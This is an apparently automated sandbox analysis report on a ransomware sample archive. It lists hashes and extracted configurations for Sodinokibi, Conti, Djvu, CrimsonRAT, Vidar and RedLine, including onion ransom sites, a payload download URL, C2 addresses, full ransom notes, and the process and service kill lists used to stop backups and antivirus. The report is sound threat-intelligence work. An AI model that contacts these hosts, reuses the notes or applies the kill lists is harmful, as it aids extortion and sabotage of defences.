Analysis
-
max time kernel
68s -
max time network
218s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2024 17:58
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00450.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00450.7z
-
Size
42.2MB
-
MD5
bfd40652a6a56169533500d1f6725940
-
SHA1
b070b8b7777b2c32965196aed7a47a3f2f7526a5
-
SHA256
c90c7e54c06ebeb429bc6b61be52dc96134991f5100779c1357b50beffa3a756
-
SHA512
60374aaecfdf66c68bb7e8f67285c84019792f4b16b3242a82de5e4d80fcf11878138e0e65a7b66a49cf7cc203e3445439b4a0c5a7c9f95481d7965e386f5804
-
SSDEEP
786432:4l+NsvkAVmYGhyE4cFDaKpPNFoRHiOjOIaYyV//qiYBv4CVL4CQsRA9BYLfJ:hKvlm7yE4STPNFoRBjOIbyV/Ci+v4Ci6
Malware Config
Extracted
C:\Recovery\read_me_lock.txt
http://t532wrjittpwhxhlf356ie3ee3t5g2mnksaubovgdagsy72cu5nbxuad.onion/4e648ee1402bb2bc
Extracted
sodinokibi
$2a$12$prOX/4eKl8zrpGSC5lnHPecevs5NOckOUW5r3s4JJYDnZZSghvBkq
8254
boisehosting.net
fotoideaymedia.es
dubnew.com
stallbyggen.se
koken-voor-baby.nl
juneauopioidworkgroup.org
vancouver-print.ca
zewatchers.com
bouquet-de-roses.com
seevilla-dr-sturm.at
olejack.ru
i-trust.dk
wasmachtmeinfonds.at
appsformacpc.com
friendsandbrgrs.com
thenewrejuveme.com
xn--singlebrsen-vergleich-nec.com
sabel-bf.com
seminoc.com
ceres.org.au
cursoporcelanatoliquido.online
marietteaernoudts.nl
tastewilliamsburg.com
charlottepoudroux-photographie.fr
aselbermachen.com
klimt2012.info
accountancywijchen.nl
creamery201.com
rerekatu.com
makeurvoiceheard.com
vannesteconstruct.be
wellplast.se
andersongilmour.co.uk
bradynursery.com
aarvorg.com
facettenreich27.de
balticdermatology.lt
artige.com
highlinesouthasc.com
crowd-patch.co.uk
sofavietxinh.com
jorgobe.at
danskretursystem.dk
higadograsoweb.com
supportsumba.nl
ruralarcoiris.com
projetlyonturin.fr
kidbucketlist.com.au
harpershologram.wordpress.com
ohidesign.com
international-sound-awards.com
krlosdavid.com
durganews.com
leather-factory.co.jp
coding-machine.com
i-arslan.de
caribbeansunpoker.com
mir-na-iznanku.com
ki-lowroermond.nl
promesapuertorico.com
kissit.ca
dezatec.es
cite4me.org
grelot-home.com
musictreehouse.net
hkr-reise.de
id-vet.com
gasolspecialisten.se
vyhino-zhulebino-24.ru
karacaoglu.nl
bayoga.co.uk
solhaug.tk
jadwalbolanet.info
ncid.bc.ca
bricotienda.com
boldcitydowntown.com
homecomingstudio.com
sojamindbody.com
castillobalduz.es
asgestion.com
dushka.ua
hiddencitysecrets.com.au
danubecloud.com
roadwarrior.app
newstap.com.ng
no-plans.com
schoolofpassivewealth.com
senson.fi
denifl-consulting.at
lmtprovisions.com
talentwunder.com
acomprarseguidores.com
myzk.site
theapifactory.com
midmohandyman.com
argos.wityu.fund
dinslips.se
kalkulator-oszczednosci.pl
wurmpower.at
drugdevice.org
foretprivee.ca
nurturingwisdom.com
funjose.org.gt
blgr.be
readberserk.com
lescomtesdemean.be
firstpaymentservices.com
malychanieruchomoscipremium.com
travelffeine.com
latribuessentielle.com
lusak.at
better.town
smessier.com
kafu.ch
ikads.org
id-et-d.fr
sanaia.com
prochain-voyage.net
edrcreditservices.nl
yassir.pro
gantungankunciakrilikbandung.com
moveonnews.com
bhwlawfirm.com
bigbaguettes.eu
edv-live.de
littlebird.salon
iyengaryogacharlotte.com
toponlinecasinosuk.co.uk
zonamovie21.net
caribdoctor.org
body-guards.it
calabasasdigest.com
elimchan.com
herbstfeststaefa.ch
thewellnessmimi.com
corola.es
pomodori-pizzeria.de
controldekk.com
lichencafe.com
lefumetdesdombes.com
seagatesthreecharters.com
copystar.co.uk
systemate.dk
alsace-first.com
webmaster-peloton.com
koko-nora.dk
jakekozmor.com
mousepad-direkt.de
iwelt.de
dirittosanitario.biz
precisionbevel.com
boulderwelt-muenchen-west.de
chatizel-paysage.fr
praxis-foerderdiagnostik.de
globedivers.wordpress.com
nosuchthingasgovernment.com
neuschelectrical.co.za
schmalhorst.de
mediaclan.info
ihr-news.jp
bunburyfreightservices.com.au
edelman.jp
backstreetpub.com
spsshomeworkhelp.com
lillegrandpalais.com
smithmediastrategies.com
enovos.de
loprus.pl
bsaship.com
importardechina.info
shhealthlaw.com
freie-baugutachterpraxis.de
maxadams.london
deprobatehelp.com
baylegacy.com
deltacleta.cat
financescorecard.com
maureenbreezedancetheater.org
plv.media
winrace.no
leoben.at
pawsuppetlovers.com
tuuliautio.fi
paradicepacks.com
1team.es
testcoreprohealthuk.com
broseller.com
iyahayki.nl
lorenacarnero.com
satyayoga.de
notmissingout.com
chavesdoareeiro.com
mezhdu-delom.ru
hugoversichert.de
jusibe.com
imaginado.de
craftleathermnl.com
sauschneider.info
atalent.fi
conexa4papers.trade
global-kids.info
serce.info.pl
agence-referencement-naturel-geneve.net
zimmerei-fl.de
augenta.com
fannmedias.com
villa-marrakesch.de
ulyssemarketing.com
x-ray.ca
schraven.de
bowengroup.com.au
sairaku.net
southeasternacademyofprosthodontics.org
modamilyon.com
pubweb.carnet.hr
alysonhoward.com
sahalstore.com
triactis.com
panelsandwichmadrid.es
xn--vrftet-pua.biz
adoptioperheet.fi
miriamgrimm.de
filmstreamingvfcomplet.be
kostenlose-webcams.com
deoudedorpskernnoordwijk.nl
live-your-life.jp
mardenherefordshire-pc.gov.uk
instatron.net
mirjamholleman.nl
euro-trend.pl
kojima-shihou.com
nuzech.com
basisschooldezonnewijzer.nl
quemargrasa.net
actecfoundation.org
gamesboard.info
podsosnami.ru
extensionmaison.info
retroearthstudio.com
polzine.net
hmsdanmark.dk
linnankellari.fi
schoellhammer.com
elpa.se
mooreslawngarden.com
rozemondcoaching.nl
lenreactiv-shop.ru
uranus.nl
advokathuset.dk
ora-it.de
love30-chanko.com
smartypractice.com
rebeccarisher.com
cafemattmeera.com
bargningavesta.se
www1.proresult.no
rhinosfootballacademy.com
polychromelabs.com
notsilentmd.org
makeflowers.ru
zimmerei-deboer.de
ccpbroadband.com
iwr.nl
wychowanieprzedszkolne.pl
greenpark.ch
bimnapratica.com
lachofikschiet.nl
memaag.com
parking.netgateway.eu
tanzschule-kieber.de
antiaginghealthbenefits.com
simulatebrain.com
digi-talents.com
hairnetty.wordpress.com
samnewbyjax.com
helikoptervluchtnewyork.nl
devlaur.com
cimanchesterescorts.co.uk
houseofplus.com
rushhourappliances.com
pelorus.group
kedak.de
lapmangfpt.info.vn
pivoineetc.fr
marchand-sloboda.com
anybookreader.de
markelbroch.com
celularity.com
rafaut.com
unim.su
latestmodsapks.com
thedresserie.com
bigasgrup.com
slimidealherbal.com
phantastyk.com
thailandholic.com
tophumanservicescourses.com
aakritpatel.com
navyfederalautooverseas.com
wien-mitte.co.at
forestlakeuca.org.au
sporthamper.com
psnacademy.in
michaelsmeriglioracing.com
jbbjw.com
colorofhorses.com
iqbalscientific.com
cleliaekiko.online
stemplusacademy.com
effortlesspromo.com
microcirc.net
mbfagency.com
theduke.de
drinkseed.com
troegs.com
peterstrobos.com
consultaractadenacimiento.com
huissier-creteil.com
geoffreymeuli.com
skanah.com
despedidascostablanca.es
alten-mebel63.ru
theadventureedge.com
profectis.de
mepavex.nl
rimborsobancario.net
pasvenska.se
tampaallen.com
symphonyenvironmental.com
videomarketing.pro
pickanose.com
licor43.de
aniblinova.wordpress.com
ventti.com.ar
hhcourier.com
buymedical.biz
oncarrot.com
nachhilfe-unterricht.com
mapawood.com
vox-surveys.com
milsing.hr
sotsioloogia.ee
nativeformulas.com
kirkepartner.dk
partnertaxi.sk
visiativ-industry.fr
transliminaltribe.wordpress.com
chefdays.de
cursosgratuitosnainternet.com
faronics.com
d2marketing.co.uk
lapinlviasennus.fi
miraclediet.fun
bristolaeroclub.co.uk
jameskibbie.com
songunceliptv.com
baronloan.org
idemblogs.com
eglectonk.online
christinarebuffetcourses.com
bastutunnan.se
blogdecachorros.com
finde-deine-marke.de
platformier.com
antenanavi.com
vanswigchemdesign.com
gporf.fr
pmc-services.de
atmos-show.com
danholzmann.com
itelagen.com
transportesycementoshidalgo.es
gymnasedumanagement.com
siluet-decor.ru
gasbarre.com
milltimber.aberdeen.sch.uk
tinkoff-mobayl.ru
expandet.dk
rumahminangberdaya.com
polymedia.dk
newyou.at
zenderthelender.com
artallnightdc.com
tomaso.gr
centrospgolega.com
sweering.fr
tux-espacios.com
ecopro-kanto.com
spacecitysisters.org
bierensgebakkramen.nl
all-turtles.com
coffreo.biz
tandartspraktijkheesch.nl
vietlawconsultancy.com
deko4you.at
tennisclubetten.nl
extraordinaryoutdoors.com
crowcanyon.com
classycurtainsltd.co.uk
apolomarcas.com
verytycs.com
manijaipur.com
veybachcenter.de
falcou.fr
associationanalytics.com
beautychance.se
pocket-opera.de
christ-michael.net
vdberg-autoimport.nl
4net.guru
finediningweek.pl
stampagrafica.es
naturalrapids.com
ussmontanacommittee.us
beaconhealthsystem.org
upplandsspar.se
tradiematepro.com.au
oneplusresource.org
maasreusel.nl
aodaichandung.com
campus2day.de
burkert-ideenreich.de
you-bysia.com.au
mediaacademy-iraq.org
xtptrack.com
eaglemeetstiger.de
mountaintoptinyhomes.com
stemenstilte.nl
noskierrenteria.com
ivfminiua.com
biapi-coaching.fr
art2gointerieurprojecten.nl
corendonhotels.com
ditog.fr
kadesignandbuild.co.uk
abogadosaccidentetraficosevilla.es
camsadviser.com
limassoldriving.com
worldhealthbasicinfo.com
kojinsaisei.info
bigler-hrconsulting.ch
girlillamarketing.com
xn--rumung-bua.online
naturstein-hotte.de
agence-chocolat-noir.com
stormwall.se
collaborativeclassroom.org
baptisttabernacle.com
streamerzradio1.site
mooglee.com
smart-light.co.uk
fitovitaforum.com
c2e-poitiers.com
igrealestate.com
wari.com.pe
takeflat.com
logopaedie-blomberg.de
mrsplans.net
mooshine.com
humanityplus.org
otsu-bon.com
onlyresultsmarketing.com
interactcenter.org
ungsvenskarna.se
35-40konkatsu.net
zzyjtsgls.com
spectrmash.ru
tenacitytenfold.com
torgbodenbollnas.se
drnice.de
lightair.com
huesges-gruppe.de
promalaga.es
paulisdogshop.de
hotelsolbh.com.br
julis-lsa.de
myteamgenius.com
darnallwellbeing.org.uk
refluxreducer.com
educar.org
kuntokeskusrok.fi
truenyc.co
comparatif-lave-linge.fr
frontierweldingllc.com
autodemontagenijmegen.nl
spylista.com
allfortheloveofyou.com
ilso.net
corona-handles.com
micahkoleoso.de
fairfriends18.de
haremnick.com
ecoledansemulhouse.fr
blewback.com
macabaneaupaysflechois.com
osterberg.fi
surespark.org.uk
stupbratt.no
hokagestore.com
mirkoreisser.de
tomoiyuma.com
tigsltd.com
manifestinglab.com
glennroberts.co.nz
hardinggroup.com
zso-mannheim.de
yousay.site
dublikator.com
oneheartwarriors.at
pointos.com
kenhnoithatgo.com
ausbeverage.com.au
testzandbakmetmening.online
grupocarvalhoerodrigues.com.br
werkkring.nl
hotelzentral.at
vibethink.net
123vrachi.ru
allure-cosmetics.at
mrxermon.de
bloggyboulga.net
bouldercafe-wuppertal.de
sobreholanda.com
smogathon.com
beyondmarcomdotcom.wordpress.com
wraithco.com
bookspeopleplaces.com
montrium.com
webcodingstudio.com
lucidinvestbank.com
ncs-graphic-studio.com
stingraybeach.com
aglend.com.au
lecantou-coworking.com
tongdaifpthaiphong.net
solerluethi-allart.ch
coursio.com
otto-bollmann.de
madinblack.com
vibehouse.rw
bridgeloanslenders.com
erstatningsadvokaterne.dk
resortmtn.com
socstrp.org
pier40forall.org
ostheimer.at
quickyfunds.com
aminaboutique247.com
jobcenterkenya.com
jenniferandersonwriter.com
marcuswhitten.site
mediaplayertest.net
irinaverwer.com
stoeberstuuv.de
lebellevue.fr
the-virtualizer.com
outcomeisincome.com
gonzalezfornes.es
kunze-immobilien.de
myhealth.net.au
helenekowalsky.com
xn--fn-kka.no
withahmed.com
simplyblessedbykeepingitreal.com
havecamerawilltravel2017.wordpress.com
muamuadolls.com
balticdentists.com
mank.de
croftprecision.co.uk
jandaonline.com
datacenters-in-europe.com
gw2guilds.org
raschlosser.de
geekwork.pl
pv-design.de
opatrovanie-ako.sk
ausair.com.au
commonground-stories.com
parebrise-tla.fr
vloeren-nu.nl
conasmanagement.de
dlc.berlin
liveottelut.com
4youbeautysalon.com
lykkeliv.net
adultgamezone.com
hexcreatives.co
citymax-cr.com
portoesdofarrobo.com
patrickfoundation.net
tonelektro.nl
atozdistribution.co.uk
urclan.net
evergreen-fishing.com
body-armour.online
nsec.se
autopfand24.de
syndikat-asphaltfieber.de
yourobgyn.net
vihannesporssi.fi
new.devon.gov.uk
teczowadolina.bytom.pl
antonmack.de
dpo-as-a-service.com
pogypneu.sk
creative-waves.co.uk
htchorst.nl
xn--fnsterputssollentuna-39b.se
norpol-yachting.com
parkstreetauto.net
sloverse.com
candyhouseusa.com
tsklogistik.eu
smejump.co.th
diversiapsicologia.es
unetica.fr
drfoyle.com
cranleighscoutgroup.org
dekkinngay.com
n1-headache.com
amerikansktgodis.se
evangelische-pfarrgemeinde-tuniberg.de
fransespiegels.nl
coastalbridgeadvisors.com
qualitaetstag.de
kath-kirche-gera.de
alhashem.net
schutting-info.nl
2ekeus.nl
berlin-bamboo-bikes.org
minipara.com
blood-sports.net
milestoneshows.com
physiofischer.de
ontrailsandboulevards.com
babcockchurch.org
healthyyworkout.com
plantag.de
krcove-zily.eu
mylolis.com
fax-payday-loans.com
praxis-management-plus.de
smokeysstoves.com
longislandelderlaw.com
calxplus.eu
mountsoul.de
dubscollective.com
luckypatcher-apkz.com
epwritescom.wordpress.com
fundaciongregal.org
klusbeter.nl
jobmap.at
oldschoolfun.net
abl1.net
labobit.it
romeguidedvisit.com
carrybrands.nl
people-biz.com
blossombeyond50.com
theclubms.com
whittier5k.com
jolly-events.com
kisplanning.com.au
rostoncastings.co.uk
ravensnesthomegoods.com
nhadatcanho247.com
vetapharma.fr
hihaho.com
tulsawaterheaterinstallation.com
purposeadvisorsolutions.com
faizanullah.com
directwindowco.com
herbayupro.com
pay4essays.net
work2live.de
stoneys.ch
webhostingsrbija.rs
lange.host
baustb.de
psa-sec.de
hushavefritid.dk
lloydconstruction.com
ra-staudte.de
mbxvii.com
tecnojobsnet.com
starsarecircular.org
twohourswithlena.wordpress.com
stoeferlehalle.de
merzi.info
garage-lecompte-rouen.fr
hypozentrum.com
nestor-swiss.ch
thomasvicino.com
kmbshipping.co.uk
denovofoodsgroup.com
planchaavapor.net
dr-pipi.de
qlog.de
lynsayshepherd.co.uk
aco-media.nl
abogadoengijon.es
bestbet.com
liliesandbeauties.org
norovirus-ratgeber.de
thee.network
stacyloeb.com
bundabergeyeclinic.com.au
sandd.nl
americafirstcommittee.org
milanonotai.it
kevinjodea.com
easytrans.com.au
westdeptfordbuyrite.com
carriagehousesalonvt.com
operaslovakia.sk
corelifenutrition.com
hashkasolutindo.com
compliancesolutionsstrategies.com
edgewoodestates.org
mastertechengineering.com
pinkexcel.com
cnoia.org
aprepol.com
rieed.de
katketytaanet.fi
lascuola.nl
assurancesalextrespaille.fr
paymybill.guru
xoabigail.com
ligiercenter-sachsen.de
answerstest.ru
airconditioning-waalwijk.nl
pixelarttees.com
freie-gewerkschaften.de
dnepr-beskid.com.ua
eco-southafrica.com
dutchcoder.nl
iphoneszervizbudapest.hu
allentownpapershow.com
bingonearme.org
summitmarketingstrategies.com
completeweddingkansas.com
wolf-glas-und-kunst.de
employeesurveys.com
scenepublique.net
monark.com
seitzdruck.com
alvinschwartz.wordpress.com
knowledgemuseumbd.com
spd-ehningen.de
boosthybrid.com.au
launchhubl.com
revezlimage.com
dontpassthepepper.com
petnest.ir
associacioesportivapolitg.cat
12starhd.online
jerling.de
kaotikkustomz.com
sarbatkhalsafoundation.org
solinegraphic.com
skiltogprint.no
craigmccabe.fun
puertamatic.es
mylovelybluesky.com
run4study.com
pierrehale.com
cactusthebrand.com
101gowrie.com
nicoleaeschbachorg.wordpress.com
architekturbuero-wagner.net
mindpackstudios.com
vitavia.lt
bouncingbonanza.com
lukeshepley.wordpress.com
igfap.com
bockamp.com
levihotelspa.fi
exenberger.at
tinyagency.com
familypark40.com
alfa-stroy72.com
boompinoy.com
mdacares.com
architecturalfiberglass.org
slupetzky.at
sinal.org
qualitus.com
deepsouthclothingcompany.com
groupe-frayssinet.fr
synlab.lt
kamienny-dywan24.pl
ilcdover.com
humancondition.com
insigniapmg.com
arteservicefabbro.com
team-montage.dk
iviaggisonciliegie.it
austinlchurch.com
rehabilitationcentersinhouston.net
zervicethai.co.th
vickiegrayimages.com
ziegler-praezisionsteile.de
crediacces.com
comarenterprises.com
courteney-cox.net
trapiantofue.it
space.ua
odiclinic.org
noesis.tech
urmasiimariiuniri.ro
8449nohate.org
xltyu.com
kikedeoliveira.com
remcakram.com
degroenetunnel.com
strandcampingdoonbeg.com
haar-spange.com
pmcimpact.com
ceid.info.tr
gemeentehetkompas.nl
stopilhan.com
dareckleyministries.com
sportverein-tambach.de
ivivo.es
braffinjurylawfirm.com
pcprofessor.com
bordercollie-nim.nl
hrabritelefon.hr
ctrler.cn
makeitcount.at
foryourhealth.live
seproc.hn
ianaswanson.com
nijaplay.com
brandl-blumen.de
lubetkinmediacompanies.com
ouryoungminds.wordpress.com
micro-automation.de
apprendrelaudit.com
securityfmm.com
geisterradler.de
morawe-krueger.de
nmiec.com
sla-paris.com
figura.team
vitalyscenter.es
jvanvlietdichter.nl
crosspointefellowship.church
handi-jack-llc.com
femxarxa.cat
wsoil.com.sg
xlarge.at
groupe-cets.com
admos-gleitlager.de
liikelataamo.fi
sevenadvertising.com
nancy-informatique.fr
ateliergamila.com
stefanpasch.me
wacochamber.com
aurum-juweliere.de
hatech.io
centuryrs.com
ilive.lt
fensterbau-ziegler.de
zflas.com
thefixhut.com
goodgirlrecovery.com
botanicinnovations.com
saxtec.com
tips.technology
smalltownideamill.wordpress.com
pt-arnold.de
tarotdeseidel.com
bildungsunderlebnis.haus
brevitempore.net
imadarchid.com
sportiomsportfondsen.nl
digivod.de
darrenkeslerministries.com
smhydro.com.pl
echtveilig.nl
schlafsack-test.net
galserwis.pl
eraorastudio.com
faroairporttransfers.net
connectedace.com
pcp-nc.com
jyzdesign.com
suncrestcabinets.ca
offroadbeasts.com
teresianmedia.org
greenfieldoptimaldentalcare.com
thomas-hospital.de
embracinghiscall.com
ralister.co.uk
rosavalamedahr.com
quizzingbee.com
richard-felix.co.uk
sipstroysochi.ru
todocaracoles.com
shiftinspiration.com
campusoutreach.org
bodyforwife.com
katiekerr.co.uk
sportsmassoren.com
trystana.com
ino-professional.ru
slashdb.com
selfoutlet.com
personalenhancementcenter.com
proudground.org
walkingdeadnj.com
d1franchise.com
anthonystreetrimming.com
forskolorna.org
brawnmediany.com
uimaan.fi
journeybacktolife.com
pferdebiester.de
kao.at
asteriag.com
hvccfloorcare.com
parks-nuernberg.de
div-vertriebsforschung.de
centromarysalud.com
asiluxury.com
chrissieperry.com
verbisonline.com
onlybacklink.com
radaradvies.nl
daklesa.de
sagadc.com
waveneyrivercentre.co.uk
mytechnoway.com
fitnessbazaar.com
fibrofolliculoma.info
fayrecreations.com
maryloutaylor.com
whyinterestingly.ru
maratonaclubedeportugal.com
maineemploymentlawyerblog.com
kosterra.com
blumenhof-wegleitner.at
punchbaby.com
wmiadmin.com
bxdf.info
harveybp.com
vermoote.de
johnsonfamilyfarmblog.wordpress.com
plastidip.com.ar
autofolierung-lu.de
highimpactoutdoors.net
cwsitservices.co.uk
hairstylesnow.site
mymoneyforex.com
victoriousfestival.co.uk
farhaani.com
web.ion.ag
simoneblum.de
carolinepenn.com
blacksirius.de
trackyourconstruction.com
naturavetal.hr
heliomotion.com
rollingrockcolumbia.com
judithjansen.com
poultrypartners.nl
baumkuchenexpo.jp
insidegarage.pl
irishmachineryauctions.com
intecwi.com
porno-gringo.com
penco.ie
jacquin-maquettes.com
anteniti.com
hebkft.hu
ftlc.es
dutchbrewingcoffee.com
behavioralmedicinespecialists.com
socialonemedia.com
cirugiauretra.es
c-a.co.in
nokesvilledentistry.com
chandlerpd.com
aunexis.ch
gmto.fr
berliner-versicherungsvergleich.de
jsfg.com
vesinhnha.com.vn
joyeriaorindia.com
greenko.pl
cerebralforce.net
rota-installations.co.uk
presseclub-magdeburg.de
yamalevents.com
renergysolution.com
roygolden.com
verifort-capital.de
delawarecorporatelaw.com
jiloc.com
icpcnj.org
1kbk.com.ua
noixdecocom.fr
entopic.com
hellohope.com
flexicloud.hk
danielblum.info
thaysa.com
mdk-mediadesign.de
nataschawessels.com
smale-opticiens.nl
charlesreger.com
kaliber.co.jp
almosthomedogrescue.dog
reddysbakery.com
waynela.com
ahouseforlease.com
binder-buerotechnik.at
happyeasterimages.org
dr-tremel-rednitzhembach.de
mikeramirezcpa.com
zweerscreatives.nl
dramagickcom.wordpress.com
commercialboatbuilding.com
argenblogs.com.ar
heurigen-bauer.at
ogdenvision.com
gadgetedges.com
izzi360.com
turkcaparbariatrics.com
spargel-kochen.de
pridoxmaterieel.nl
heidelbergartstudio.gallery
ftf.or.at
kaminscy.com
filmvideoweb.com
meusharklinithome.wordpress.com
xn--thucmctc-13a1357egba.com
tstaffing.nl
abogadosadomicilio.es
igorbarbosa.com
homesdollar.com
ncuccr.org
caffeinternet.it
abogados-en-alicante.es
evologic-technologies.com
oslomf.no
desert-trails.com
gastsicht.de
nvwoodwerks.com
slwgs.org
vorotauu.ru
lionware.de
bodyfulls.com
myhostcloud.com
amylendscrestview.com
bptdmaluku.com
bogdanpeptine.ro
perbudget.com
strategicstatements.com
simpliza.com
innote.fi
365questions.org
sanyue119.com
walter-lemm.de
cuppacap.com
teknoz.net
layrshift.eu
blog.solutionsarchitect.guru
parkcf.nl
themadbotter.com
upmrkt.co
modelmaking.nl
nandistribution.nl
ledmes.ru
coding-marking.com
sachnendoc.com
thedad.com
mercantedifiori.com
artotelamsterdam.com
plotlinecreative.com
bauertree.com
woodleyacademy.org
dw-css.de
leda-ukraine.com.ua
destinationclients.fr
jasonbaileystudio.com
cheminpsy.fr
devstyle.org
kindersitze-vergleich.de
live-con-arte.de
bee4win.com
fiscalsort.com
jeanlouissibomana.com
huehnerauge-entfernen.de
eadsmurraypugh.com
fotoscondron.com
DupontSellsHomes.com
brigitte-erler.com
imperfectstore.com
shonacox.com
nacktfalter.de
devok.info
esope-formation.fr
mariposapropaneaz.com
sw1m.ru
mrtour.site
hannah-fink.de
bafuncs.org
kampotpepper.gives
ampisolabergeggi.it
cuspdental.com
philippedebroca.com
abitur-undwieweiter.de
hoteledenpadova.it
tanciu.com
delchacay.com.ar
cortec-neuro.com
theshungiteexperience.com.au
deschl.net
biortaggivaldelsa.com
fitnessingbyjessica.com
dsl-ip.de
officehymy.com
shadebarandgrillorlando.com
bargningharnosand.se
mmgdouai.fr
daniel-akermann-architektur-und-planung.ch
xn--logopdie-leverkusen-kwb.de
buroludo.nl
ymca-cw.org.uk
executiveairllc.com
allamatberedare.se
servicegsm.net
kingfamily.construction
nakupunafoundation.org
henricekupper.com
shsthepapercut.com
lbcframingelectrical.com
ladelirante.fr
clos-galant.com
dr-seleznev.com
siliconbeach-realestate.com
tanzprojekt.com
fatfreezingmachines.com
kamahouse.net
gratispresent.se
softsproductkey.com
marathonerpaolo.com
gopackapp.com
manutouchmassage.com
marketingsulweb.com
craigvalentineacademy.com
catholicmusicfest.com
gaiam.nl
woodworkersolution.com
pasivect.co.uk
cyntox.com
advizewealth.com
y-archive.com
saarland-thermen-resort.com
fizzl.ru
oemands.dk
mrsfieldskc.com
levdittliv.se
rksbusiness.com
sexandfessenjoon.wordpress.com
first-2-aid-u.com
simpkinsedwards.co.uk
the-domain-trader.com
rocketccw.com
celeclub.org
urist-bogatyr.ru
lapinvihreat.fi
ecpmedia.vn
zieglerbrothers.de
piajeppesen.dk
joseconstela.com
carlosja.com
real-estate-experts.com
toreria.es
analiticapublica.es
kariokids.com
leeuwardenstudentcity.nl
psc.de
tetinfo.in
ai-spt.jp
homng.net
em-gmbh.ch
trulynolen.co.uk
oceanastudios.com
csgospeltips.se
luxurytv.jp
abuelos.com
birnam-wood.com
theletter.company
bbsmobler.se
restaurantesszimmer.de
insp.bi
besttechie.com
autodujos.lt
chaotrang.com
galleryartfair.com
321play.com.hk
saka.gr
tandartspraktijkhartjegroningen.nl
steampluscarpetandfloors.com
waermetauscher-berechnen.de
sterlingessay.com
justinvieira.com
waywithwords.net
shiresresidential.com
naswrrg.org
spinheal.ru
slimani.net
modestmanagement.com
triggi.de
cityorchardhtx.com
narcert.com
-
net
false
-
pid
$2a$12$prOX/4eKl8zrpGSC5lnHPecevs5NOckOUW5r3s4JJYDnZZSghvBkq
-
prc
encsvc
powerpnt
ocssd
steam
isqlplussvc
outlook
sql
ocomm
agntsvc
mspub
onenote
winword
thebat
excel
mydesktopqos
ocautoupds
thunderbird
synctime
infopath
mydesktopservice
firefox
oracle
sqbcoreservice
dbeng50
tbirdconfig
msaccess
visio
dbsnmp
wordpad
xfssvccon
-
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
-
ransom_template
---=== Welcome. Again. ===--- [-] Whats HapPen? [-] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decoder.re/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
-
sub
8254
-
svc
veeam
memtas
sql
backup
vss
sophos
svc$
mepocs
Extracted
crimsonrat
134.119.181.142
10.5.26.108
Extracted
vidar
39.4
931
https://sergeevih43.tumblr.com/
-
profile_id
931
Extracted
C:\Program Files\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.best
Extracted
C:\Recovery\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.best
Extracted
C:\Recovery\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.icu/
Extracted
C:\Users\r9p1525r-readme.txt
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8305E0107A7515E2
http://decoder.re/8305E0107A7515E2
Extracted
C:\Users\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.top
Extracted
C:\Program Files\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.best
Extracted
djvu
http://astdg.top/nddddhsspen6/get.php
-
extension
.zzla
-
offline_id
nZH1798DvPbIMQmK7lZZDSpe81UIFzsEMm3NtJt1
-
payload_url
http://dgos.top/dl/build2.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0314ewgfDd
Extracted
redline
terrornax
45.88.3.176:17033
Signatures
-
Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Detect ZGRat V2 2 IoCs
resource yara_rule behavioral1/memory/7052-14697-0x00000000056A0000-0x00000000056DA000-memory.dmp family_zgrat_v2 behavioral1/memory/7128-21505-0x00000000051A0000-0x00000000051DA000-memory.dmp family_zgrat_v2 -
Detected Djvu ransomware 2 IoCs
resource yara_rule behavioral1/memory/6680-2592-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/6680-2637-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
